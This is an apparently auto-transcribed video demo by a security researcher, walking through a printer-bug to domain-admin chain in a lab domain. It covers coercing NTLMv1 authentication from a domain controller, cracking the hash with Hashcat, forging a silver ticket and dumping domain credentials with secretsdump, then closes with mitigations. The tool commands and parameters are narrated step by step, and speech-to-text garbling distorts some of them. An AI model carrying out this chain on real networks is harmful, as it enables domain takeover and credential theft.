 Hi everybody, it's Evilmog from TeamHashcat and also X-ForceRed. I'm here to talk to you all about a fantastic chain of vulnerabilities that leads to domain admin. I call this printers to domain admin. So, first off, what we're going to be exploiting is this wonderful feature that Tifkin from SpectraOps discovered called the MSRP-RN principaler book. Basically what it does is it's a feature to have a domain controller to tell a client where its printers are. Now, any user can request this packet to be sent to them. And what it can also do is try and enforce authentication. Now, if the client says, hey, I only support NTLM version 1 and the domain controller is trying to authenticate to them, it will authenticate using its machine account. That machine account can then be reversed from NTLM version 1 to NTLM. And once we've reversed NTLM, we can create a silver ticket and then DC sync the server. So with that, let's begin. The first thing we're going to need to do is find out the domain SID of the machine we're going to attack. Now, we're going to specify that we start off with domain user credentials. And so we are already a regular domain user. We would have gotten this through Responder, some other method, or being a legit user on the network. So we're running enum for Linux on 192.168.1.3 on my mog.local domain. Now, we're going to see a whole bunch of stuff, so we're going to have to scroll up. And we're going to see the domain SID is right here. This is the security identifier for the domain. And it did not require any credentials to pull, so we're going to go export SID equals. And even though these aren't required, I put them around just out of my own safety sake, because I've been burned once or twice. So we now have the SID. Fantastic. Next thing we're going to need is we're going to use our credentials on the net NTLM silver ticket repo with a tool called Dementor. So we're now in the repo, so we're going to go .slash or pythondementor.py. So in order to use Dementor, we need a domain username, which is going to be evoMog. We need a password. In this case, password is password with an exclamation mark. Yes, this is a demo. Yes, it's junk. I'm okay with this. Now we're going to use a domain, the domain name of the log. Next thing we're going to do is go into another window. We're going to set up responder. So responder interface of ETH0, yeah, let's go with that. And now we're going to fire over to Dementor and fire off the authentication back at us. Next thing we're going to need is the listener IP. So the IP range on this, sorry, it was listener and target. So $attackerIP. I pre-exported mine because I can't remember what it was. And we're going to go with the target IP. It's going to send the attack. We're seeing access denied. Here we'll see an NTLM version 1 SSP hash. Now we'll see I attempted to go set this as 1-1-2-2-3-3-4-4-5-5-6-6-7-7-8-8 for the client challenge, but it zeroed out these. I kind of specified TAC-TAC-LM and it would have gotten me a better result, but in this case I wanted to demonstrate NTLM version 1 with SSP on video because it's fun. So we're going to copy this. I'm now going to go into my NTLM version 1 multi-tool. Python, NTLM v1.py. We're specifying NTLM and our hash. Now if you want to use crack.sh and pay $200, you absolutely can. Now the other option is we're going to do this with Hashcat. Now this will normally take you about three to five days with, you know, from 16 to 32 GPUs. It'll cost you about $1,000 in that AWS time. I haven't timed this out for a while, so my numbers might be inaccurate. But on 16 GTX 1080s it takes about four days, five. So what we're going to do is we're going to copy this. We're going to copy the $14,000 hash because it's already ready to go into Hashcat. We're going to go into my Hashcat directory, paste that. Just make sure it's a fresh file, nothing on my sleeve. Now we're going to take the command it told us to crack it with Hashcat. Telling us to use mode 14,000, attack mode three, which is a brute force, using the DES character set, and our attack type, already feel for you. Now because I have a time machine, it's going to crack instantly. Perfect, see? It's already cracked instantly. So let's go show these hashes right now. So here we have the portion of the NTLM, but it's actually being returned as a DES key. We need to convert these DES keys into a portion of an NTLM. So we're going to get, we're going to throw up my Hashcat utils, SRC, and we're going to want the DES key to NTLM portion. So here is part one. We are then going to do part two. What was that back over here? Part two. Now the most important part, we're also going to have to calculate the last four characters of the NTLM. Again, there's already Hashcat utility for that, so we're going to go into git slash Hashcat utils, SRC, and then we are going to use a profile CT3 to NTLM. But it already tells us that because we do the paste, and there we are. We have our NTLM. So the NTLM is going to be part one, part two, part three. Fantastic. So now we're going back into our handy dandy utility. Export NTLM equals, now to prove there's nothing on my sleeve on this one, crack map exec, SMB 192.168.1.3, username is going to be DC $1 sign, because that means it's a machine account. We're going to use the hash of dollars NTLM. And there we are. We've authenticated as the domain machine account. Now we're going to run ticker. Now this command is a little bit complex. So first we're going to run Python. We're going to select where our ticker location is. We're going to use the NTLM hash, which we'll see here is 1D. Matches right up with what we have here ending in 904C. So that's your NTLM hash for the machine account. There is the domain SID that we captured earlier. That is this S121 here using enum for Linux. The domain name here is Mogbell local. Now the important part is the SPN. SPN is a service principal name. So in this case, we know it's a machine. So we know it's DC1. We know it's in Mog.local. All domain controllers by default will or should, in most cases, have a host slash DC, or a host slash for their SPN. So we can guess that this machine's SPN, or look at it in bloodhound, but in this case we guessed, host slash DC1.mog.local, and then the administrator, guessing it's administrator probably is. A lot of people change it, but that is how we create our silver ticket. Now I'm gonna hit enter. It's gonna create this Kerberosker cache file for you. Now you need to go run an export. So it means I keep forgetting the syntax. History, grep, export, grep, ccache, hit dash n1, there we go, exports. So we've specified here's where our cache file is. Now we're gonna proceed to SecretsDump, the domain controller, grep, SecretsDump, okay, dash n1, there we go. So we're gonna run SecretsDump. The syntax for this one is gonna be, you know, our Python three, SecretsDump, dash k means these Kerberos, tachnodactpass means don't ask for a password. We're gonna specify Mog at, or the domain Mog administrator at DC1.mog.local, and we're gonna DC sync the interesting. This happens, let's go take a look. There we go, she's the right tool. So we've used our, so the syntax for this one was Python running SecretsDump, our target was administrator at DC1.mog.local, dash k was used Kerberos, tachnodactpass was, don't ask for a password. And here we see our administrator hash, our guest hash, and our machine account, which we just finished extracting. So that is how you silver ticket a domain controller and DC sync it with just a regular domain user. Now for mitigations on this, what you're gonna wind up doing is, there's a setting called the Landman compatibility level. I'll include a link to it in the slides for this. There's a setting that we're set for two or lower, which basically means allow NTLM. That's what, if you increase that setting to five, that will completely block this. The other mitigations are disabled, the print spooler service on any sensitive server, such as domain controllers. Now this will cause an impact on some environments, as clients will no longer be able to update the printer list, but hopefully you have a better way of pushing printers, such as SCCM. So that is the one downside, but it will prevent domain controls from reaching out. This works up until server 2016. I have not seen it work in server 2019, and it again depends on your landman compatibility level. Thank you very much for tuning in. This has been Evilmog from X-Force Red and Team Hashcat.